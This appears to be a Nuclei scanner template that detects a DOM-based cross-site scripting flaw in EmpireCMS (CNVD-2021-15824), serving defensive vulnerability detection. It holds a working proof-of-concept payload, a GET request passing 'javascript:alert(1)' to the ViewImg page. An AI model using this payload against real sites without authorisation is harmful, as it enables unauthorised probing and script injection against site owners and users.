37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: CNVD-2021-15824
|
|
|
|
info:
|
|
name: EmpireCMS DOM Cross Site-Scripting
|
|
author: daffainfo
|
|
severity: high
|
|
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
|
|
reference:
|
|
- https://sourceforge.net/projects/empirecms/
|
|
- https://www.bilibili.com/read/cv10441910
|
|
- https://vul.wangan.com/a/CNVD-2021-15824
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
tags: cnvd2021,cnvd,empirecms,xss,domxss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'if(Request("url")!=0)'
|
|
- 'href=\""+Request("url")+"\"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 |